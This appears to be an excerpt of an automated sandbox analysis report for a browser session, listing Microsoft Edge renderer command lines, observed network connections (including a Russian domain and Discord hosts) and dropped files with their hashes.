"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6564 /prefetch:1

Network

Country Destination Domain Proto
US 52.111.229.19:443 tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
GB 95.101.143.201:443 tcp
US 52.168.117.174:443 browser.pipe.aria.microsoft.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 81.90.181.184:443 sk3dsuite.ru tcp
US 162.159.136.234:443 discord.gg tcp
NL 23.62.61.160:443 r.bing.com tcp
NL 23.62.61.160:443 r.bing.com tcp
NL 23.62.61.160:443 r.bing.com tcp
NL 23.62.61.160:443 r.bing.com tcp
NL 23.62.61.160:443 r.bing.com tcp
NL 23.62.61.160:443 r.bing.com tcp
RU 81.90.181.184:443 sk3dsuite.ru tcp
US 162.159.137.232:443 status.discord.com tcp
US 104.26.9.90:80 optifine.net tcp
N/A 224.0.0.251:5353 udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
N/A 127.0.0.1:6463 tcp
N/A 127.0.0.1:6464 tcp
N/A 127.0.0.1:6465 tcp
N/A 127.0.0.1:6466 tcp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 104.19.229.21:443 api.hcaptcha.com tcp
NL 23.63.101.153:80 apps.identrust.com tcp
N/A 127.0.0.1:6467 tcp
US 74.125.250.129:19302 stun.l.google.com udp
N/A 127.0.0.1:6468 tcp
US 104.19.230.21:443 api.hcaptcha.com tcp
N/A 127.0.0.1:6469 tcp
N/A 127.0.0.1:6470 tcp
N/A 127.0.0.1:6471 tcp
N/A 127.0.0.1:6472 tcp
US 162.159.136.234:443 discord.gg tcp
US 162.159.128.233:443 status.discord.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 13.107.246.64:443 fp-afd-nocache-ccp.azureedge.net tcp
US 13.107.136.254:443 spo-ring.msedge.net tcp
US 162.159.136.234:443 discord.gg tcp
RU 81.90.181.184:443 sk3dsuite.ru tcp
RU 81.90.181.184:443 sk3dsuite.ru tcp
US 52.123.128.254:443 dual-s-ring.msedge.net tcp
US 104.26.9.90:80 optifine.net tcp
N/A 127.0.0.1:6463 tcp
N/A 127.0.0.1:6464 tcp
N/A 127.0.0.1:6465 tcp
N/A 127.0.0.1:6466 tcp
N/A 127.0.0.1:6467 tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
N/A 127.0.0.1:6468 tcp
N/A 127.0.0.1:6469 tcp
N/A 127.0.0.1:6470 tcp
N/A 127.0.0.1:6471 tcp
N/A 127.0.0.1:6472 tcp

Files

memory/1156-0-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/1156-1-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/1156-2-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/1156-3-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/1156-4-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/1156-7-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/1156-6-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/1156-5-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/1156-9-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/2588-10-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/2588-11-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/2588-12-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/2588-13-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/2588-14-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/2588-16-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/2588-15-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 7915c5c12c884cc2fa03af40f3d2e49d
SHA1 d48085f85761cde9c287b0b70a918c7ce8008629
SHA256 e79d4b86d8cabd981d719da7f55e0540831df7fa0f8df5b19c0671137406c3da
SHA512 4c71eb6836546d4cfdb39cd84b6c44687b2c2dee31e2e658d12f809225cbd495f20ce69030bff1d80468605a3523d23b6dea166975cedae25b02a75479c3f217

\??\pipe\LOCAL\crashpad_3908_AHGLEBCBMWMRAAKR

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 9faad3e004614b187287bed750e56acc
SHA1 eeea3627a208df5a8cf627b0d39561167d272ac5
SHA256 64a60300c46447926ce44b48ce179d01eff3dba906b83b17e48db0c738ca38a9
SHA512 a7470fe359229c2932aa39417e1cd0dc47f351963cbb39f4026f3a2954e05e3238f3605e13c870c9fe24ae56a0d07e1a6943df0e891bdcd46fd9ae4b7a48ab90

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 cade32ea1b47b63a6154fc8b3e3874e6
SHA1 3051465b6a34e970b9e4c1d1ab51f6131b410ba9
SHA256 03ca625e10a0a7431a87d936779103886f03a6fec1ebdf7de2524391f7514fd8
SHA512 0eecdb43c9f12c39e3ada5720ab1d94e2c0b862fd326cbe3469f282abfbb9e30793be91d24e1ef5689403d1661b25a9250ef6fd6e8f9bc83aa74141878c8d67b

memory/2588-66-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

memory/2588-211-0x00007FFAC8610000-0x00007FFACBD6F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1791b52056684a19047b902fa6b9b3db
SHA1 85448349d72f67ea96bed61cb364e0eccc3a1783
SHA256 121437c527a35287271f1341b7ec52a1ec0302f854c73fba1ea585bd281e272f
SHA512 90971580f8cf1c4d23d764c6f96101bdd0c0af7e09dfbdb7b4543335fd7181eac5a4a9b86198440333e871df2a78a751e7ddfdf3eda7f07ccddf45fa63a59cf3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 79af9856cf72c70ef72f7b642d581da7
SHA1 7b1609c4bb1674674126a6e51b7e9d21708ded1e
SHA256 39fcada3c2fd547e937a4e293871a89b61f5d165658a7bda49b76fbd4e79bb94
SHA512 784d5dafd81e5efd161a8229b4b62eacdc8d7381c7c0fe3a653623f3e55e910359e5c3294ddda8979242e9382246b698e9fa6d92eff25ab1c7cc8d747736a471

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b0a65b2653a7ef4a114a955d7e2a622f
SHA1 690a56763a7fb21016cb26094337a195678fb8a7
SHA256 a05c8e00594885eb28e3d9e26eb8541cf57ab940e1a9887486958724db68d9f7
SHA512 dd81bd2fa3e7a75cc714036feddd09251870c3e4269500e0b5418531d9d189b3e69768987740b2ad7e7f38e932eb2a04b3e563a578ffdab0064b78e29998b57a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 02bb8e97e505c1e118f6fccbf4c7f861
SHA1 f69d54cd2f82ad0d36b943e70c78b0e10ee78430
SHA256 9cc8765766fa3b1e437df4818ed0bc2bee0a2b18fc7f51c3f96577629dec6387
SHA512 cd1a6f799cb23ad2e6310c4eb4ad5475bd303b7647966c8dd9114638e4eac2b6c1737bd492353f6e0caee7c21f8d88752a375981234b3db71479e9e4f83f7daa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 30772dae3ba4f21f0e8b576871624f4e
SHA1 47a898e67494cc8a19e91d87c3952acb8780fb6d
SHA256 6c6eba42979b22b5b5b3ebf5ef65c5fafdf88539119eb491f24fad15277e0e06
SHA512 a36a2157fc098b3823980ca6868d237056ce553e9130ac0ea6a626e90032734203175faaac933d167dba9f59ac67c81fd96d1bde1d84d1295a6afb71adeba66c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5a83a8.TMP

MD5 81cdfee7f70ba7539c582a88b3b44fd7
SHA1 d75d0a5d7f226214f1e9d665432c7ac89409fd0d
SHA256 7d49051a47b7427bf044f60f39a1a47084fb1969d7ec14e8a5046d4d72442554
SHA512 6aea4256bb557da384ca529e616390533acab120463ed283acb9efa258cc382c5bbfc083606501495ee701254ea12433f15829e77dc2c4bd06d6ff225c11902d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 b364226d880119bdc498fcd1e92c9f68
SHA1 f5d9979654d08f198e3d3dc661e08b2597eaca02
SHA256 6c60c1e32f605ac48cd1d9dea671c46e22d868a947dcdde3d4093c47096482e9
SHA512 42f72d7d160e0b883009bd2ac76b14f78da590c3566514d61c6d0380f3db9fab8786af43218e869f8ec2aa8cb23899690bf4f8f3410657f3dedb331f9690f315

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 263873fd2ad0c10f02404b207d1190b8
SHA1 ed65c13e6f730b2d7e6da669b9f0c76a1683b26a
SHA256 976cb80c6c561faf6b70b761ec1f5347718a2557820bf64b92cdaf46fd21c6c0
SHA512 3fe38c79c35be5058008d0309ff6438bc2760aaccbdeb851cd9fcd223cb8e58997ff6bc9383e0b9cd079f7e10d44379bf3dcf38f853e8c1e17e60b59f0cd0562

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8a73fdff70d2f7012d60f4f305a27852
SHA1 f196eef59676d777846c11fdbe2f4595aa982910
SHA256 4a6f967836ac15005e4959ae91821e6d4552c2406e5005c945ec4bd0f9fb63a9
SHA512 fa39a315b876acc784e992079bf465e8830da5d780935e9f79938bc9843ce069f11a288f9d699b1d359ad8aa1b107c6070e2bbcbd79e0ca749a48f356b7295c5

memory/6028-544-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

memory/6028-545-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

memory/6028-546-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

memory/6028-547-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

memory/6028-548-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d03cb29dab407a31240f04acd2ea54d5
SHA1 40e4fea68fa1ddb2c05ee3ca6b45e2740344ba7b
SHA256 6403bdd730b256bfad120c929db6602600c84707c5743a9f7666084085e1b9fe
SHA512 1ae1790ee6265f5701d1696d855fd065b5447b6e8eab18f5d2393e16cda4f192c9d125d80c8bfd68cecc855d9d1cd2462be0fc6daa726bb97920ecb5f7746dae

memory/6028-550-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

memory/6028-549-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

MD5 07bd004322d7b2832709191bddd0567a
SHA1 9149ed0c2466995a3b6dd5182865a78fd76ec0ea
SHA256 6160a9f25b0dba39f0325b3268e0c00e2c374fd278fd1e90edc2fa87271b55bd
SHA512 28de08cc0284652a62600ea99583a758e83b8c79e10982a8fb11058bb5bfeac5570ecc51b4c58589e8f1b821645839ea5639dbdea2071bd1af9d0d4145e2d944

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2551177587-3778486488-1329702901-1000\83aa4cc77f591dfc2374580bbd95f6ba_f3dcadc9-113d-4c66-8517-189abc125a61

MD5 c8366ae350e7019aefc9d1e6e6a498c6
SHA1 5731d8a3e6568a5f2dfbbc87e3db9637df280b61
SHA256 11e6aca8e682c046c83b721eeb5c72c5ef03cb5936c60df6f4993511ddc61238
SHA512 33c980d5a638bfc791de291ebf4b6d263b384247ab27f261a54025108f2f85374b579a026e545f81395736dd40fa4696f2163ca17640dd47f1c42bc9971b18cd

memory/6028-729-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

memory/6028-757-0x00007FFAC09F0000-0x00007FFAC414F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7a7b39ab2b35bea67f90050cb2ad1caa
SHA1 e519ce5d656032a0435deb56e9cdee0a9159edf4
SHA256 d770282ba7d589cca06af59f1ebdb7f46a1e27412acd63153b0bc0b860e8c2a1
SHA512 a9e900ed7775cc45337f4e74655ecd6ccdae715ec397c3487c6a2d01bcf327b0950ff16b04eca2ed760c0011ed210fbc42e37952499509aef866142b2119052a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 7d87af219fe4088e07c33886edaba040
SHA1 72dc27f6b49b0bd9e520c391f9986a16132c0e56
SHA256 1cff4da5fb2be3aae9da26184004ce2973f07909702053f0fbf01ffbfacaa767
SHA512 ffb51c2c6fa5f3c68d9d6b5d62c4b946c40ec8fc8d47f0cf1cc2070b7acef983a3350c0201138f8536585c503427a7c8c7f72e92100c89b297d2bb7eff62a5d3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 6b318b908a9618017e97ab21fdbbb339
SHA1 9122af9f2814c73c0dd158b329f1d434e05e2966
SHA256 6ea1b85df4b6c151b00f8e7b88396f10c3052f42e62767893d2fc6862f3eb026
SHA512 8f94a7742470b4d18b3f70859e3903be55d2bcb6a01421f49dbb4e685e3365798914201b905e849e5ca8b01eb97cd74237d3a3389d777c3be23529d0c27d7f5c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 717451e9ea2787fbc0966f9584b0e4cc
SHA1 636b3104f3d3410dbe0bd3944ad9629f771529e4
SHA256 d7d579814018385fcafdafeab2d622dbb234eea487cc77cfef9dc7cbd4adde99
SHA512 8178a5471deb17e234624625562141e9e22455465f32457230e4dc85c8d833975ef598232a660367b05c182910313564e16f2f0571a1ad310b7bd7f6e957a590

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 9269ebfd6a99751ed8995ff3e3f8179b
SHA1 a8062f75a114d0dcc731952e40ae42e86ac8dd73
SHA256 3bc18611978785f6c8f45e106ad1d155e3ff0536c4946db796a54eb7c29369b1
SHA512 a10d50fbdf5aa47500583b41821bd0acb1ac0f5bd6eb7b973dad8ec9b9a69a91df12d06a8b95c57272ff0430ca95acc1628d276ea93270c2746ef39fe945bb2b